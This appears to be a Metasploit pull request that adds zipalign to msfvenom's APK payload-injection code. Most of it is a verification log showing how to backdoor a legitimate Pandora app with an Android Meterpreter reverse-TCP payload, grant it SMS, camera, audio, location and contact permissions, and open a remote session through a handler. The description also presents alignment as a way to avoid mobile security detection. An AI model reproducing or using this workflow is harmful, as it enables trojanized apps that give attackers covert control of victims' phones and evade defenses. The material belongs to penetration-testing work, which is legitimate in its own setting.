### PR TITLE
Run zipalign as last step during APK injection process

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -204,7 +204,7 @@ module Msf::Payload::Apk
     print_status "Loading #{smalifile} and injecting payload..\n"
     File.open(smalifile, "wb") {|file| file.puts hookedsmali }
     injected_apk = "#{tempdir}/output.apk"
-    unaligned_apk = "#{tempdir}/unaligned.apk"
+    aligned_apk = "#{tempdir}/aligned.apk"
     print_status "Poisoning the manifest with meterpreter permissions..\n"
     fix_manifest(tempdir)
 
@@ -213,10 +213,9 @@ module Msf::Payload::Apk
     print_status "Signing #{injected_apk}\n"
     run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey")
     print_status "Aligning #{injected_apk}\n"
-    FileUtils.mv("#{injected_apk}", "#{unaligned_apk}")
-    run_cmd("zipalign 4 #{unaligned_apk} #{injected_apk}")
+    run_cmd("zipalign 4 #{injected_apk} #{aligned_apk}")
 
-    outputapk = File.read(injected_apk)
+    outputapk = File.read(aligned_apk)
 
     FileUtils.remove_entry tempdir
     outputapk


### PR DESCRIPTION
This change adds zipalign as a final step in the APK injection process exposed via msfvenom.

Running zipalign on an APK after signing and before distribution
is considered general best practice. Also, properly aligning an APK
makes it less likely to be flagged as suspicious by mobile security
solutions.

More on zipalign from Google:

https://developer.android.com/studio/command-line/zipalign.html

Here is the legitimate APK that I used for testing:

https://www.dropbox.com/s/jnjq8o41uwxazql/Pandora_7.4.apk?dl=0
## Verification
- [ ] Inject an android/meterpreter/reverse_tcp payload into a legitimate APK via msfvenom

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ ./msfvenom -x ~/Android/Pandora_7.4.apk -p android/meterpreter/reverse_tcp LHOST=10.6.9.37 LPORT=1337 -o PandoraRat.apk
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/apk/classes.dex is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/apk is being used
Using APK template: /home/msfdev/Android/Pandora_7.4.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Copying payload files..
[*] Loading /tmp/d20160928-21427-f6a93j/original/smali/com/pandora/android/Main.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.CHANGE_WIFI_STATE
[*] Adding android.permission.ACCESS_COURSE_LOCATION
[*] Adding android.permission.ACCESS_FINE_LOCATION
[*] Adding android.permission.SEND_SMS
[*] Adding android.permission.RECEIVE_SMS
[*] Adding android.permission.RECORD_AUDIO
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.READ_CONTACTS
[*] Adding android.permission.WRITE_CONTACTS
[*] Adding android.permission.RECORD_AUDIO
[*] Adding android.permission.WRITE_SETTINGS
[*] Adding android.permission.CAMERA
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding /home/msfdev/Android/Pandora_7.4.apk with meterpreter injection as /tmp/d20160928-21427-f6a93j/output.apk
[*] Signing /tmp/d20160928-21427-f6a93j/output.apk
[*] Aligning /tmp/d20160928-21427-f6a93j/output.apk
Payload size: 16694227 bytes
Saved as: PandoraRat.apk
[ruby-2.3.1@metasploit-framework](zipalignapk) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```
- [] **Verify** An "[_] Aligning /tmp/_.apk" status message is displayed after the "[_] Signing /tmp/_.apk" status message and the backdoor payload is generated as expected

```
...
[*] Signing /tmp/d20160928-21427-f6a93j/output.apk
[*] Aligning /tmp/d20160928-21427-f6a93j/output.apk
Payload size: 16694227 bytes
Saved as: PandoraRat.apk
...
```
- [] Use zipalign on the generated APK to verify alignment

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ zipalign -c -v 4 PandoraRat.apk 
Verifying alignment of PandoraRat.apk (4)...
      50 META-INF/MANIFEST.MF (OK - compressed)
  103746 META-INF/ANDROIDD.SF (OK - compressed)
  208107 META-INF/ANDROIDD.RSA (OK - compressed)
  209225 AndroidManifest.xml (OK - compressed)
  216836 assets/bmwgroup/bmw/images/5000.png (OK)
  217324 assets/bmwgroup/bmw/images/5001.png (OK)
  217892 assets/bmwgroup/bmw/images/5002.png (OK)
...
14797127 res/xml/caption_preference.xml (OK - compressed)
14797762 res/xml/daydream.xml (OK - compressed)
14798012 resources.arsc (OK)
Verification succesful
[ruby-2.3.1@metasploit-framework](zipalignapk) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```
- [] Start msfconsole and setup a multi/handler with the android/meterpreter/reverse_tcp payload [REMINDER: Use LHOST and LPORT values relevant to your test environment]

```
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.6.9.37
LHOST => 10.6.9.37
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 10.6.9.37:1337 
[*] Starting the payload handler...
```
- [] Install the generated APK on an emulated or physical Android device that is able to connect back to the handler using the address and port specified via the LHOST and LPORT values
- [] Start the APK on the emulated or physical Android device
- [] **Verify** A meterpreter session is available on the emulated or physical Android device

```
[*] Started reverse TCP handler on 10.6.9.37:1337 
[*] Starting the payload handler...
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/metstage.jar is being used
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/meterpreter.jar is being used
[*] Sending stage (67110 bytes) to 10.6.9.1
[*] Meterpreter session 1 opened (10.6.9.37:1337 -> 10.6.9.1:64976) at 2016-09-28 21:29:13 -0700
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.4.67+ (i686)
Meterpreter : java/android
meterpreter > getuid
Server username: u0_a56
meterpreter >
```
- [] Inject an android/meterpreter/reverse_tcp payload into a legitimate APK via msfvenom with zipalign missing from the user/system $PATH

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ ./msfvenom -x ~/Android/Pandora_7.4.apk -p android/meterpreter/reverse_tcp LHOST=10.6.9.37 LPORT=1337 -o PandoraRat.apk
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/apk/classes.dex is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/apk is being used
Using APK template: /home/msfdev/Android/Pandora_7.4.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
Error: zipalign not found. If it's not in your PATH, please add it.
[ruby-2.3.1@metasploit-framework](zipalignapk) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```
- [] **Verify** An error is displayed to inform the user that zipalign cannot be found

```
...
Error: zipalign not found. If it's not in your PATH, please add it.
...
```
